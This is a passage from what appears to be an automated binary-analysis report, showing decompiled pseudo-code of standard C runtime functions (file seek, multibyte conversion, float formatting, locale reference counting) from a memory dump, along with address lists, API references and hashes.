                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                              • Instruction ID: 4ed17461b18e8ad078d68ebb72b884049137bbd641d90a5a2387fd8933cf83de
                                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                              • Instruction Fuzzy Hash: C0F06230600A0AE2DB005FA1ED1E3EFBE79BB84B46F5101A19192B0094DF34D1B5825A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 97%
                                                                                                              			E00405CB0(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				signed int _t30;
                                                                                                              				signed int _t31;
                                                                                                              				signed int _t32;
                                                                                                              				signed int _t33;
                                                                                                              				signed int _t35;
                                                                                                              				signed int _t39;
                                                                                                              				void* _t42;
                                                                                                              				intOrPtr _t43;
                                                                                                              				void* _t45;
                                                                                                              				signed int _t48;
                                                                                                              				signed int* _t53;
                                                                                                              				void* _t54;
                                                                                                              				void* _t55;
                                                                                                              				void* _t57;
                                                                                                              
                                                                                                              				_t54 = __ebp;
                                                                                                              				_t45 = __edx;
                                                                                                              				_t42 = __ebx;
                                                                                                              				_t53 = _a4;
                                                                                                              				if(_t53 == 0) {
                                                                                                              					L40:
                                                                                                              					_t31 = _t30 | 0xffffffff;
                                                                                                              					__eflags = _t31;
                                                                                                              					return _t31;
                                                                                                              				} else {
                                                                                                              					_t43 = _a12;
                                                                                                              					if(_t43 == 2) {
                                                                                                              						goto L40;
                                                                                                              					} else {
                                                                                                              						_t30 = _t53[0xe];
                                                                                                              						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                              							goto L40;
                                                                                                              						} else {
                                                                                                              							_t48 = _a8;
                                                                                                              							if(_t53[0x17] != 0x77) {
                                                                                                              								__eflags = _t43 - 1;
                                                                                                              								if(_t43 == 1) {
                                                                                                              									_t48 = _t48 + _t53[0x1a];
                                                                                                              									__eflags = _t48;
                                                                                                              								}
                                                                                                              								__eflags = _t48;
                                                                                                              								if(_t48 < 0) {
                                                                                                              									goto L39;
                                                                                                              								} else {
                                                                                                              									__eflags = _t53[0x16];
                                                                                                              									if(__eflags == 0) {
                                                                                                              										_t33 = _t53[0x1a];
                                                                                                              										__eflags = _t48 - _t33;
                                                                                                              										if(_t48 < _t33) {
                                                                                                              											_t30 = E004054A0(_t42, _t54, _t53);
                                                                                                              											_t55 = _t55 + 4;
                                                                                                              											__eflags = _t30;
                                                                                                              											if(_t30 < 0) {
                                                                                                              												goto L39;
                                                                                                              											} else {
                                                                                                              												goto L27;
                                                                                                              											}
                                                                                                              										} else {
                                                                                                              											_t48 = _t48 - _t33;
                                                                                                              											L27:
                                                                                                              											__eflags = _t48;
                                                                                                              											if(_t48 == 0) {
                                                                                                              												L38:
                                                                                                              												return _t53[0x1a];
                                                                                                              											} else {
                                                                                                              												__eflags = _t53[0x12];
                                                                                                              												if(_t53[0x12] != 0) {
                                                                                                              													L30:
                                                                                                              													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                              													if(_t53[0x1b] != 0xffffffff) {
                                                                                                              														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                              														_t48 = _t48 - 1;
                                                                                                              														__eflags = _t53[0x1c];
                                                                                                              														_t53[0x1b] = 0xffffffff;
                                                                                                              														if(_t53[0x1c] != 0) {
                                                                                                              															_t53[0xe] = 1;
                                                                                                              														}
                                                                                                              													}
                                                                                                              													__eflags = _t48;
                                                                                                              													if(_t48 <= 0) {
                                                                                                              														goto L38;
                                                                                                              													} else {
                                                                                                              														while(1) {
                                                                                                              															_t35 = 0x4000;
                                                                                                              															__eflags = _t48 - 0x4000;
                                                                                                              															if(_t48 < 0x4000) {
                                                                                                              																_t35 = _t48;
                                                                                                              															}
                                                                                                              															_t30 = E004059D0(_t45, _t53, _t53[0x12], _t35);
                                                                                                              															_t55 = _t55 + 0xc;
                                                                                                              															__eflags = _t30;
                                                                                                              															if(_t30 <= 0) {
                                                                                                              																goto L39;
                                                                                                              															}
                                                                                                              															_t48 = _t48 - _t30;
                                                                                                              															__eflags = _t48;
                                                                                                              															if(_t48 > 0) {
                                                                                                              																continue;
                                                                                                              															} else {
                                                                                                              																goto L38;
                                                                                                              															}
                                                                                                              															goto L41;
                                                                                                              														}
                                                                                                              														goto L39;
                                                                                                              													}
                                                                                                              												} else {
                                                                                                              													_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
                                                                                                              													_t55 = _t55 + 4;
                                                                                                              													_t53[0x12] = _t30;
                                                                                                              													__eflags = _t30;
                                                                                                              													if(_t30 == 0) {
                                                                                                              														goto L39;
                                                                                                              													} else {
                                                                                                              														goto L30;
                                                                                                              													}
                                                                                                              												}
                                                                                                              											}
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										_push(0);
                                                                                                              										_push(_t48);
                                                                                                              										_push(_t53[0x10]);
                                                                                                              										_t53[0x1b] = 0xffffffff;
                                                                                                              										_t53[1] = 0;
                                                                                                              										 *_t53 = _t53[0x11];
                                                                                                              										_t30 = E0040C42B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                              										__eflags = _t30;
                                                                                                              										if(_t30 < 0) {
                                                                                                              											goto L39;
                                                                                                              										} else {
                                                                                                              											_t53[0x1a] = _t48;
                                                                                                              											_t53[0x19] = _t48;
                                                                                                              											return _t48;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							} else {
                                                                                                              								if(_t43 == 0) {
                                                                                                              									_t48 = _t48 - _t53[0x19];
                                                                                                              								}
                                                                                                              								if(_t48 < 0) {
                                                                                                              									L39:
                                                                                                              									_t32 = _t30 | 0xffffffff;
                                                                                                              									__eflags = _t32;
                                                                                                              									return _t32;
                                                                                                              								} else {
                                                                                                              									if(_t53[0x11] != 0) {
                                                                                                              										L11:
                                                                                                              										if(_t48 <= 0) {
                                                                                                              											L17:
                                                                                                              											return _t53[0x19];
                                                                                                              										} else {
                                                                                                              											while(1) {
                                                                                                              												_t39 = 0x4000;
                                                                                                              												if(_t48 < 0x4000) {
                                                                                                              													_t39 = _t48;
                                                                                                              												}
                                                                                                              												_t30 = E00405210(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                              												_t55 = _t55 + 0xc;
                                                                                                              												if(_t30 == 0) {
                                                                                                              													goto L39;
                                                                                                              												}
                                                                                                              												_t48 = _t48 - _t30;
                                                                                                              												if(_t48 > 0) {
                                                                                                              													continue;
                                                                                                              												} else {
                                                                                                              													goto L17;
                                                                                                              												}
                                                                                                              												goto L41;
                                                                                                              											}
                                                                                                              											goto L39;
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
                                                                                                              										_t57 = _t55 + 4;
                                                                                                              										_t53[0x11] = _t30;
                                                                                                              										if(_t30 == 0) {
                                                                                                              											goto L39;
                                                                                                              										} else {
                                                                                                              											E0040B9F0(_t48, _t30, 0, 0x4000);
                                                                                                              											_t55 = _t57 + 0xc;
                                                                                                              											goto L11;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L41:
                                                                                                              			}



















                                                                                                              0x00405dec
                                                                                                              0x00405df3
                                                                                                              0x00405df5
                                                                                                              0x00405df5
                                                                                                              0x00405df3
                                                                                                              0x00405dfc
                                                                                                              0x00405dfe
                                                                                                              0x00000000
                                                                                                              0x00405e00
                                                                                                              0x00405e00
                                                                                                              0x00405e00
                                                                                                              0x00405e05
                                                                                                              0x00405e07
                                                                                                              0x00405e09
                                                                                                              0x00405e09
                                                                                                              0x00405e11
                                                                                                              0x00405e16
                                                                                                              0x00405e19
                                                                                                              0x00405e1b
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405e1d
                                                                                                              0x00405e1f
                                                                                                              0x00405e21
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405e21
                                                                                                              0x00000000
                                                                                                              0x00405e00
                                                                                                              0x00405dca
                                                                                                              0x00405dcf
                                                                                                              0x00405dd4
                                                                                                              0x00405dd7
                                                                                                              0x00405dda
                                                                                                              0x00405ddc
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405ddc
                                                                                                              0x00405dc8
                                                                                                              0x00405dc2
                                                                                                              0x00405d73
                                                                                                              0x00405d79
                                                                                                              0x00405d7b
                                                                                                              0x00405d7c
                                                                                                              0x00405d7d
                                                                                                              0x00405d84
                                                                                                              0x00405d8b
                                                                                                              0x00405d8d
                                                                                                              0x00405d95
                                                                                                              0x00405d97
                                                                                                              0x00000000
                                                                                                              0x00405d9d
                                                                                                              0x00405d9d
                                                                                                              0x00405da0
                                                                                                              0x00405da7
                                                                                                              0x00405da7
                                                                                                              0x00405d97
                                                                                                              0x00405d71
                                                                                                              0x00405cea
                                                                                                              0x00405cec
                                                                                                              0x00405cee
                                                                                                              0x00405cee
                                                                                                              0x00405cf3
                                                                                                              0x00405e29
                                                                                                              0x00405e2a
                                                                                                              0x00405e2a
                                                                                                              0x00405e2e
                                                                                                              0x00405cf9
                                                                                                              0x00405cfd
                                                                                                              0x00405d27
                                                                                                              0x00405d29
                                                                                                              0x00405d57
                                                                                                              0x00405d5c
                                                                                                              0x00405d2b
                                                                                                              0x00405d30
                                                                                                              0x00405d30
                                                                                                              0x00405d37
                                                                                                              0x00405d39
                                                                                                              0x00405d39
                                                                                                              0x00405d41
                                                                                                              0x00405d46
                                                                                                              0x00405d4b
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405d51
                                                                                                              0x00405d55
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405d55
                                                                                                              0x00000000
                                                                                                              0x00405d30
                                                                                                              0x00405cff
                                                                                                              0x00405d04
                                                                                                              0x00405d09
                                                                                                              0x00405d0c
                                                                                                              0x00405d11
                                                                                                              0x00000000
                                                                                                              0x00405d17
                                                                                                              0x00405d1f
                                                                                                              0x00405d24
                                                                                                              0x00000000
                                                                                                              0x00405d24
                                                                                                              0x00405d11
                                                                                                              0x00405cfd
                                                                                                              0x00405cf3
                                                                                                              0x00405ce8
                                                                                                              0x00405cd0
                                                                                                              0x00405cc4
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: _fseek_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 208892515-0
                                                                                                              • Opcode ID: f8e7edbf3f90f31ef8fb9ed918db1b5b7717394cce6efc79da1edb831684deec
                                                                                                              • Instruction ID: fb1dde6b94970b1238faede9759046b2f1ea0db44af508fad206ce6175512b40
                                                                                                              • Opcode Fuzzy Hash: f8e7edbf3f90f31ef8fb9ed918db1b5b7717394cce6efc79da1edb831684deec
                                                                                                              • Instruction Fuzzy Hash: C341A572600F014AD7309A2EE80571772E5DF80324F140A3FE5D6E27D5E738E9858F99
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0041525F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                              				char _v8;
                                                                                                              				signed int _v12;
                                                                                                              				char _v20;
                                                                                                              				char _t43;
                                                                                                              				char _t46;
                                                                                                              				signed int _t53;
                                                                                                              				signed int _t54;
                                                                                                              				intOrPtr _t56;
                                                                                                              				int _t57;
                                                                                                              				int _t58;
                                                                                                              				signed short* _t59;
                                                                                                              				short* _t60;
                                                                                                              				int _t65;
                                                                                                              				char* _t72;
                                                                                                              
                                                                                                              				_t72 = _a8;
                                                                                                              				if(_t72 == 0 || _a12 == 0) {
                                                                                                              					L5:
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					if( *_t72 != 0) {
                                                                                                              						E0040EC46( &_v20, _a16);
                                                                                                              						_t43 = _v20;
                                                                                                              						__eflags =  *(_t43 + 0x14);
                                                                                                              						if( *(_t43 + 0x14) != 0) {
                                                                                                              							_t46 = E00415390( *_t72 & 0x000000ff,  &_v20);
                                                                                                              							__eflags = _t46;
                                                                                                              							if(_t46 == 0) {
                                                                                                              								__eflags = _a4;
                                                                                                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                              								if(__eflags != 0) {
                                                                                                              									L10:
                                                                                                              									__eflags = _v8;
                                                                                                              									if(_v8 != 0) {
                                                                                                              										_t53 = _v12;
                                                                                                              										_t11 = _t53 + 0x70;
                                                                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                              										__eflags =  *_t11;
                                                                                                              									}
                                                                                                              									return 1;
                                                                                                              								}
                                                                                                              								L21:
                                                                                                              								_t54 = E0040BF81(__eflags);
                                                                                                              								 *_t54 = 0x2a;
                                                                                                              								__eflags = _v8;
                                                                                                              								if(_v8 != 0) {
                                                                                                              									_t54 = _v12;
                                                                                                              									_t33 = _t54 + 0x70;
                                                                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                              									__eflags =  *_t33;
                                                                                                              								}
                                                                                                              								return _t54 | 0xffffffff;
                                                                                                              							}
                                                                                                              							_t56 = _v20;
                                                                                                              							_t65 =  *(_t56 + 0xac);
                                                                                                              							__eflags = _t65 - 1;
                                                                                                              							if(_t65 <= 1) {
                                                                                                              								L17:
                                                                                                              								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                              								if(__eflags < 0) {
                                                                                                              									goto L21;
                                                                                                              								}
                                                                                                              								__eflags = _t72[1];
                                                                                                              								if(__eflags == 0) {
                                                                                                              									goto L21;
                                                                                                              								}
                                                                                                              								L19:
                                                                                                              								_t57 =  *(_t56 + 0xac);
                                                                                                              								__eflags = _v8;
                                                                                                              								if(_v8 == 0) {
                                                                                                              									return _t57;
                                                                                                              								}
                                                                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                              								return _t57;
                                                                                                              							}
                                                                                                              							__eflags = _a12 - _t65;
                                                                                                              							if(_a12 < _t65) {
                                                                                                              								goto L17;
                                                                                                              							}
                                                                                                              							__eflags = _a4;
                                                                                                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                              							__eflags = _t58;
                                                                                                              							_t56 = _v20;
                                                                                                              							if(_t58 != 0) {
                                                                                                              								goto L19;
                                                                                                              							}
                                                                                                              							goto L17;
                                                                                                              						}
                                                                                                              						_t59 = _a4;
                                                                                                              						__eflags = _t59;
                                                                                                              						if(_t59 != 0) {
                                                                                                              							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                              						}
                                                                                                              						goto L10;
                                                                                                              					} else {
                                                                                                              						_t60 = _a4;
                                                                                                              						if(_t60 != 0) {
                                                                                                              							 *_t60 = 0;
                                                                                                              						}
                                                                                                              						goto L5;
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}


















                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415293
                                                                                                              • __isleadbyte_l.LIBCMT ref: 004152C7
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 004152F8
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00415366
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                              • Instruction ID: 91a149e0a6e05a58f83ecb50570e8582bfb939df11a57d8db06aa35464dead11
                                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                              • Instruction Fuzzy Hash: E531F332A00649EFCB20DFA4C8849EF7BA1FF41350B1885AAE8618B291D334CD80DF58
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0041349B(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                              				intOrPtr _t25;
                                                                                                              				void* _t26;
                                                                                                              				void* _t28;
                                                                                                              
                                                                                                              				_t25 = _a16;
                                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                              					_t26 = E00412D8C(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              					goto L9;
                                                                                                              				} else {
                                                                                                              					_t34 = _t25 - 0x66;
                                                                                                              					if(_t25 != 0x66) {
                                                                                                              						__eflags = _t25 - 0x61;
                                                                                                              						if(_t25 == 0x61) {
                                                                                                              							L7:
                                                                                                              							_t26 = E00412E7C(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              						} else {
                                                                                                              							__eflags = _t25 - 0x41;
                                                                                                              							if(__eflags == 0) {
                                                                                                              								goto L7;
                                                                                                              							} else {
                                                                                                              								_t26 = E004133A1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						L9:
                                                                                                              						return _t26;
                                                                                                              					} else {
                                                                                                              						return E004132E6(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}







                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction ID: c2aaebdd6b1e97fbd04afef3038c10a9fddef8c749c4dc6d406879d47bd1d4cb
                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction Fuzzy Hash: B0114E7200014EBBCF225E95CD018EE3F27BF18755B588416FA1899131C73BCAB1AB89
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 95%
                                                                                                              			E00413F9D(void* __eax, void* __ebx, void* __edx) {
                                                                                                              				signed int _t14;
                                                                                                              				LONG* _t20;
                                                                                                              				long _t22;
                                                                                                              				void* _t24;
                                                                                                              				void* _t28;
                                                                                                              				void* _t29;
                                                                                                              				LONG* _t30;
                                                                                                              				void* _t31;
                                                                                                              
                                                                                                              				_t28 = __edx;
                                                                                                              				_t24 = __ebx;
                                                                                                              				_t29 = __eax;
                                                                                                              				_t14 =  *0x422e34; // 0xfffffffe
                                                                                                              				if(( *(__eax + 0x70) & _t14) == 0 ||  *((intOrPtr*)(__eax + 0x6c)) == 0) {
                                                                                                              					E0040D6A0(_t24, 0xd);
                                                                                                              					 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                                                                                              					_t30 =  *(_t29 + 0x68);
                                                                                                              					 *(_t31 - 0x1c) = _t30;
                                                                                                              					__eflags = _t30 -  *0x422d38; // 0x2901600
                                                                                                              					if(__eflags != 0) {
                                                                                                              						__eflags = _t30;
                                                                                                              						if(_t30 != 0) {
                                                                                                              							_t22 = InterlockedDecrement(_t30);
                                                                                                              							__eflags = _t22;
                                                                                                              							if(_t22 == 0) {
                                                                                                              								__eflags = _t30 - 0x422910;
                                                                                                              								if(__eflags != 0) {
                                                                                                              									_push(_t30);
                                                                                                              									E0040B675(_t24, _t29, _t30, __eflags);
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t20 =  *0x422d38; // 0x2901600
                                                                                                              						 *(_t29 + 0x68) = _t20;
                                                                                                              						_t30 =  *0x422d38; // 0x2901600
                                                                                                              						 *(_t31 - 0x1c) = _t30;
                                                                                                              						InterlockedIncrement(_t30);
                                                                                                              					}
                                                                                                              					 *(_t31 - 4) = 0xfffffffe;
                                                                                                              					E00414027();
                                                                                                              				} else {
                                                                                                              					_t30 =  *(__eax + 0x68);
                                                                                                              				}
                                                                                                              				if(_t30 == 0) {
                                                                                                              					E0040E75A(_t28, _t29, 0x20);
                                                                                                              				}
                                                                                                              				return E0040E1DD(_t30);
                                                                                                              			}












                                                                                                              APIs
                                                                                                              • __amsg_exit.LIBCMT ref: 00413FB8
                                                                                                              • __lock.LIBCMT ref: 00413FC8
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00413FE5
                                                                                                              • InterlockedIncrement.KERNEL32(02901600), ref: 00414010
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked$DecrementIncrement__amsg_exit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 2485133824-0
                                                                                                              • Opcode ID: adb4ce2422961a7b06f3ffedef57ff1fdce7c5c2389a78d8f1dfa0396eb9b74e
                                                                                                              • Instruction ID: e61ed66a8314bc7393d4cb68ba787bf960b4b3089ad3da6bdce36f45b7028b55
                                                                                                              • Opcode Fuzzy Hash: adb4ce2422961a7b06f3ffedef57ff1fdce7c5c2389a78d8f1dfa0396eb9b74e
                                                                                                              • Instruction Fuzzy Hash: C9018032E05611ABC7209F26990579AB770AF44B21F44442BE818A7290C77CAA82CBCD
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%